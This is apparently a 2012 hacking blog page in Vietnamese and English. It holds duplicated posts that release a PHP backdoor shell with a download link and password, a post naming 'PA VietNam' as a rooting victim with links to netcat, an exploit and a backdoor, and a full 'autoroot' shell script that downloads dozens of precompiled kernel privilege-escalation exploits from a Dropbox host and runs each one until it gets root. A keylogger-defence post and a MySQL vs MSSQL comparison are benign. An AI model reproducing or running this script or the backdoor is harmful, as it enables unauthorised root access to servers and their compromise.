Sunday, April 22, 2012

MadSpot Security Team Shell V 1.0

This is our first release to so many more program's yet to come and released on MadSpot.Net.



I am very fortunate to release the Php Backdoor created by Our Team Member, Mr Ikram Ali,
I would like to say, he has done an amazing job, He made it very useful for penetration testers to penetrate there servers for multiples ways of vulnerabilities. He made the Backdoor with multiple functions.
I would like to congratulate Mr Ikram Ali for his wonderful coding and design for the MadSpot Security Team Shell.
There are multiple functions in this Php Shell including to work  both on Windows and Linux servers.
We highly hope that our users like it and please Join us on Our Facebook Page.
We need new ideas from users, We want you to let us know what kind of tools and help they needed from us.
We will try our best to guide you and help you for all kind of users from average to advanced users relating to penetration testing and programing.
We are group of very small Programers and Security Experts from Pakistan.
Please download the shell from the link below:-
We added some cool wallpapers of MadSpot.Net in it also.
Have fun and best of Luck.
Download Link:-  Click here to download from Mediafire.com
Password:- http://madspot.net
Like Our Facebook Page:- http://www.facebook.com/pages/MadSpot-Security-Team/224278670998389
Join MadSpot.Net on Facebook:- http://www.facebook.com/MadSpot.Net
Join MadSpot.Net Facebook Group:- http://www.facebook.com/groups/251614228257895/ 
vào lúc No comments:

MadSpot Security Team Shell V 1.0

This is our first release to so many more program's yet to come and released on MadSpot.Net.



I am very fortunate to release the Php Backdoor created by Our Team Member, Mr Ikram Ali,
I would like to say, he has done an amazing job, He made it very useful for penetration testers to penetrate there servers for multiples ways of vulnerabilities. He made the Backdoor with multiple functions.
I would like to congratulate Mr Ikram Ali for his wonderful coding and design for the MadSpot Security Team Shell.
There are multiple functions in this Php Shell including to work  both on Windows and Linux servers.
We highly hope that our users like it and please Join us on Our Facebook Page.
We need new ideas from users, We want you to let us know what kind of tools and help they needed from us.
We will try our best to guide you and help you for all kind of users from average to advanced users relating to penetration testing and programing.
We are group of very small Programers and Security Experts from Pakistan.
Please download the shell from the link below:-
We added some cool wallpapers of MadSpot.Net in it also.
Have fun and best of Luck.
Download Link:-  Click here to download from Mediafire.com
Password:- http://madspot.net
Like Our Facebook Page:- http://www.facebook.com/pages/MadSpot-Security-Team/224278670998389
Join MadSpot.Net on Facebook:- http://www.facebook.com/MadSpot.Net
Join MadSpot.Net Facebook Group:- http://www.facebook.com/groups/251614228257895/ 
vào lúc No comments:

How TO Protect Your System From Keyloggers

A key-logger, or system monitor is a small program that stores all keystokes typed by user on effective systeam. Key logger can sent those logs by FTP and emails. Some keylogger has can do lot more than just recording keystokes.

    Now the main reason for this artical is how to protect your system form the effect of keylogger. Keylogger came in form of any file, mostly in .exe file. Keep that in mind that attacker of the file will use social engginering to force you to click on it. You need to be really carefull while reciveing files and attached files form any unknown and know person.


    The most common reason, which resulted to effective my keylogger is untrustworthy websites. Thoses site contain key-logger code in them that exploit your browser and cause it to quitly install a keylogger program without you permission. It is not complusery that only trustworthy sites can cause you effective my keylogger there is possiblity that hacker hack any good sites and use it for his own purpose.


Following are some tips which help you defend against keylogger:

  • Always use good and updated Antivirus.
  • Install firewall. And Don't remain of windows default firewall. Be-leave me it really sucks. Kespersky and comodo filewall works good and it free.
  • Keep your system updated.
  • Use antikeylogger like  Web Watcher and etc. http://www.filehippo.com/software/antimalware/ this will also help you alot.
  • Use Antivirus spyware program and install it with updated version.
  • Use the updated browser for surfing. 
  • Always download file with care. If any antivirus give any kind of alert, take serous action about it. And catch that program before it make any damage in your system.
vào lúc No comments:

How TO Protect Your System From Keyloggers

A key-logger, or system monitor is a small program that stores all keystokes typed by user on effective systeam. Key logger can sent those logs by FTP and emails. Some keylogger has can do lot more than just recording keystokes.

    Now the main reason for this artical is how to protect your system form the effect of keylogger. Keylogger came in form of any file, mostly in .exe file. Keep that in mind that attacker of the file will use social engginering to force you to click on it. You need to be really carefull while reciveing files and attached files form any unknown and know person.


    The most common reason, which resulted to effective my keylogger is untrustworthy websites. Thoses site contain key-logger code in them that exploit your browser and cause it to quitly install a keylogger program without you permission. It is not complusery that only trustworthy sites can cause you effective my keylogger there is possiblity that hacker hack any good sites and use it for his own purpose.


Following are some tips which help you defend against keylogger:

  • Always use good and updated Antivirus.
  • Install firewall. And Don't remain of windows default firewall. Be-leave me it really sucks. Kespersky and comodo filewall works good and it free.
  • Keep your system updated.
  • Use antikeylogger like  Web Watcher and etc. http://www.filehippo.com/software/antimalware/ this will also help you alot.
  • Use Antivirus spyware program and install it with updated version.
  • Use the updated browser for surfing. 
  • Always download file with care. If any antivirus give any kind of alert, take serous action about it. And catch that program before it make any damage in your system.
vào lúc No comments:

GetRoot PA VietNam

Victim: PA VietNam

Tool :
=============
NetCat

http://download389.mediafire.com/ojy...nl2/netcat.rar
=============
Exploit:
Giải nén => up lên server => chmod +x cho file run.sh => chạy file
http://www.mediafire.com/download.php?wuyinmjmgrg
=============
locus shell : backdoor host
http://www.mediafire.com/?0vk8v5m8kzcqgvf
=============
TUT GetRoot PA VietNam
http://www.mediafire.com/?2q4botdhyml
vào lúc No comments:

New Autoroot for kernel update 2012 (private)

Đây là các exploit kernel từng phiên bản đã biên dịch gcc rồi... chỉ cần download up lên + chmod là chạy.

Phòng tránh link die download attack:

#!/bin/sh
# Auto Rooting Exploiter Script
# _____ __ __________ __
# / _ \ __ ___/ |_ ____ \______ \ ____ _____/ |_
# / /_\ \| | \ __\/ _ \ | _// _ \ / _ \ __\
#/ | \ | /| | ( <_> ) | | ( <_> | <_> ) |
#\____|__ /____/ |__| \____/ |____|_ /\____/ \____/|__|
# \/ \/
#To start script "./autoroot.sh"
#Author :- Ne0-h4ck3r
#Love To :- sec4ever.com
#Greetz to :- TiGER-M@ATE,ApOcalYpse,The Injector,N4ss1m,H311-C0d3,b0x,FoX-HaCkEr,darkl00k,Goog!l-warrr!03,m4ck,br0wn-sug4r
#Email ID :- localhost_21@hotmail.com



function checkroot {
if [ "$(id -u)" = "0" ]; then
cd ..;
rm -r sec4;
echo "Got root";
exit;
else
echo "No good. Still "`whoami`;
echo "";
fi;
}

uname -a;
mkdir sec4;
cd sec4;
echo "Checking if already root...";
checkroot;

wget http://dl.dropbox.com/u/59362344/new/1-2;
chmod 0777 1-2;
./1-2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/1-3;
chmod 0777 1-3;
./1-3;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/1-4;
chmod 0777 1-4;
./1-4;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2;
chmod 0777 2;
./2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2-1;
chmod 0777 2-1;
./2-1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2-6-32-46-2011;
chmod 0777 2-6-32-46-2011;
./2-6-32-46-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2-6-37;
chmod 0777 2-6-37;
./2-6-37;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-6-x86-2011;
chmod 0777 2.6.18-6-x86-2011;
./2.6.18-6-x86-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-164-2010;
chmod 0777 2.6.18-164-2010;
./2.6.18-164-2010;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-194;
chmod 0777 2.6.18-194;
./2.6.18-194;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-194.1-2010;
chmod 0777 2.6.18-194.1-2010;
./2.6.18-194.1-2010;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/acid;
chmod 0777 acid;
./acid;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-194.2-2010;
chmod 0777 2.6.18-194.2-2010;
./2=2.6.18-194.2-2010;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-274-2011;
chmod 0777 2.6.18-274-2011;
./2.6.18-274-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...12.1.el5-2012;
chmod 0777 2.6.18-374.12.1.el5-2012;
./2.6.18-374.12.1.el5-2012;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.28-2011;
chmod 0777 2.6.28-2011;
./2.6.28-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.32-46.1.BHsmp;
chmod 0777 2.6.32-46.1.BHsmp;
./2.6.32-46.1.BHsmp;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.33;
chmod 0777 2.6.33;
./2.6.33;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.33-2011;
chmod 0777 2.6.33-2011;
./2.6.33-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...-2011Exploit1;
chmod 0777 2.6.34-2011Exploit1;
./2.6.34-2011Exploit1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...-2011Exploit2;
chmod 0777 2.6.34-2011Exploit2;
./2.6.34-2011Exploit2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.37;
chmod 0777 2.6.37;
./2.6.37;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.37-rc2;
chmod 0777 2.6.37-rc2;
./2.6.37-rc2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.34-2011Exploit1;
chmod 0777 2.34-2011Exploit1;
./2.34-2011Exploit1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/3;
chmod 0777 3;
./3;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/4;
chmod 0777 4;
./4;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/5;
chmod 0777 5;
./5;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/6;
chmod 0777 6;
./6;
checkroot;


wget http://dl.dropbox.com/u/59362344/new/7;
chmod 0777 7;
./7;
checkroot;


wget http://dl.dropbox.com/u/59362344/new/7-2;
chmod 0777 7-2;
./7-2;
checkroot;


wget http://dl.dropbox.com/u/59362344/new/7x;
chmod 0777 7x;
./7x;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/8;
chmod 0777 8;
./8;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/9;
chmod 0777 9;
./9;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/10;
chmod 0777 10;
./10;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/11;
chmod 0777 11;
./11;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/13x;
chmod 0777 13x;
./13x;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/14;
????: Th3 0uTl4wS r3Fug3 http://board.th3-0utl4ws.com/showthread.php?t=24228
chmod 0777 14;
./14;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/15.sh;
chmod 0777 15.sh;
./15.sh;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/16;
chmod 0777 16;
./16;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/16-1;
chmod 0777 16-1;
./16-1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/18;
chmod 0777 18;
./18;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/18-5;
chmod 0777 18-5;
./18-5;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/31;
chmod 0777 31;
./31;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/36-rc1;
chmod 0777 36-rc1;
./36-rc1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/44;
chmod 0777 44;
./44;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/15150;
chmod 0777 15150;
./15150;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/15200;
chmod 0777 15200;
./15200;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/exp1;
chmod 0777 exp1;
./exp1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/exp2;
chmod 0777 exp2;
./exp2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/exp3;
chmod 0777 exp3;
./exp3;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/exploit;
chmod 0777 exploit;
./exploit;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/full-nelson;
chmod 0777 full-nelson;
./full-nelson;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/gayros;
chmod 0777 gayros;
./gayros;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/lenis.sh;
chmod 0777 lenis.sh;
./lenis.sh;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...xploit-gayros;
chmod 0777 local-root-exploit-gayros;
./local-root-exploit-gayros;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/pwnkernel;
chmod 0777 pwnkernel;
./pwnkernel;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/root1;
chmod 0777 root1;
./root1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/root.py;
chmod 0777 root.py;
./root.py;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/runx;
chmod 0777 runx;
./runx;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/tivoli;
chmod 0777 tivoli;
./tivoli;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/ubuntu;
chmod 0777 ubuntu;
./ubuntu;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...-root-exploit;
????: Th3 0uTl4wS r3Fug3 http://board.th3-0utl4ws.com/showthread.php?t=24228
chmod 0777 vmsplice-local-root-exploit;
./vmsplice-local-root-exploit;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/z1d-2011;
chmod 0777 z1d-2011;
./z1d-2011;
checkroot;

exploit.rar‎
vào lúc No comments:

So sánh MySQL và SQL server !


MS SQL và MySQL đều có những điểm đặc thù của chúng. Nếu cần so sánh, nên so sánh theo tính năng, hiệu suất, bảo mật và khả năng phục hồi.... 

Tôi thấy MySql phiên bản 4.x không thể so với MSSQL vì phiên bản này thiếu khá nhiều tính năng quan trọng để được xếp loại là một CSDL hạng nặng (ví dụ như thiếu ứng dụng View, StoreProc, Triggers...). Để công bằng nên thử so sánh MySql 5.x và MSSQL 2005. 

1. Tính năng: 
Tôi cho rằng MySql hơn MSSQL ở tính năng cung cấp nhiều loại storage engine. Tuy nhiên tính về mặt integration chặt chẽ cho trọn bộ hệ thống và công cụ phát triển software thì MSSQL integrate tốt hơn MySql, đặc biệt ở mảng .NET. MSSQL còn hỗ trợ XML trực tiếp trong DB, trong khi đó thì MySQL chưa làm được chuyện này. Các chức năng cần thiết như View, StoreProcedure, Trigger thì cả hai tương đương nhau. 

2. Hiệu suất: 
Tính về mặt hiệu suất, có rất nhiều thử nghiệm và tường trình cho rằng MSSQL perform kém hơn MySQL nhiều mặt. MSSQL đòi hỏi tài nguyên rất lớn (CPU mạnh, nhiều RAM...), nếu không nó rất ì ạch. MySQL không đòi hỏi nhiều như MSSQL. MySQL có thể chạy trên các UNIX highend system và perform tốt hơn MSSQL trên Windows highend server trong nhiều trường hợp. 

3. Bảo mật: 
MSSQL qua mặt MySQL về tính bảo mật ở column level. MySQL chỉ có thể set access đến row level là hết. Hệ thống xác thực người dùng của MSSQL cũng qua mặt MySQL. Tuy vậy, trên bình diện "để hở cổng" thì MSSQL dễ bị exploit hơn MySQL bởi MSSQL tích hợp quá chặt vào hệ điều hành. Lỗi của hệ điều hành hoặc một bộ phận nào đó dẫn đến việc nhân nhượng MSSQL nhanh chóng hơn MySQL. 

4. Khả năng nhân bản (replication): 
Cả hai đều có khả năng replicate hoặc cung cấp phương tiện để làm việc này. Tuy nhiên, MySQL nhanh hơn và ít sự cố hơn MSSQL vì tất cả các SQL statements dùng để thay đổi, cập nhật dữ liệu được lưu giữ trong binary log. MSSQL cung cấp nhiều phương pháp replicate cao cấp hơn, chi tiết hơn bởi thế nó phức tạp hơn và chậm hơn. 

5. Khả năng phục hồi (recovery): 
Nếu MySQL chạy thuần túy với MyISAM storage engine thì khả năng phục hồi (sau khi bị crash) không cách gì so sánh với MSSQL. Tuy nhiên nếu MySQL chạy với Innodb engine thì khả năng phục hồi không thua kém gì MSSQL. Ngoài ra, khả năng phục hồi còn được xét ở biên độ liên quan đến khả năng nhân bản (replication) ở trên. Bởi vì MSSQL cung cấp nhiều phương thức nhân bản nên việc phục hồi dữ liệu trên MSSQL dễ dàng hơn. 

6. Phí tổn: 
MySQL bản community không hề tốn tiền để mua nhưng bạn phải tự xắn tay áo lên. Tuy nhiên cài đặt, sử dụng và tối ưu MySQL không khó vì tài liệu của nó rất đầy đủ, thông tin về MySQL tràn ngập trên web. So với MSSQL, bạn phải trả gần một ngàn rưỡi đô cho 1 license MSSQL standard và khi cần support, bạn phải trả thêm tiền support (tùy case). MS vẫn cung cấp bản MSSQL không thu phí dành cho mục đích development. Tài liệu về MSSQL cũng rất nhiều trên mạng. Bản MySQL enterprise thì phải trả tiền (khoảng 400 đô) nhưng bạn được support đầy đủ. 

Kinh nghiệm bản thân tôi thấy MySQL dùng được. Có thể cáng đáng khối lượng dữ liệu rất lớn. Tuy vậy, dùng MyISAM thì nhanh nhưng sẽ gặp nhiều vấn đề phức tạp. Dùng Innodb thì chậm hơn nhưng ít bị những trục trặc về "deadlock". Dùng MSSQL thì server phải tốt không thì ì ạch lắm. Nói chung, dùng CSDL nào đi chăng nữa, việc tối ưu chúng là việc không thể thiếu được. Việc nhập / xuất dữ liệu nên xét thật kỹ lưỡng và logic. Không lạm dụng tính năng của CSDL và phó mặc cho chúng. Tất cả các SQL statement phải "make sense" và vừa đủ. 

[SOURCE]hvaonline.net[/SOURCE]
vào lúc No comments: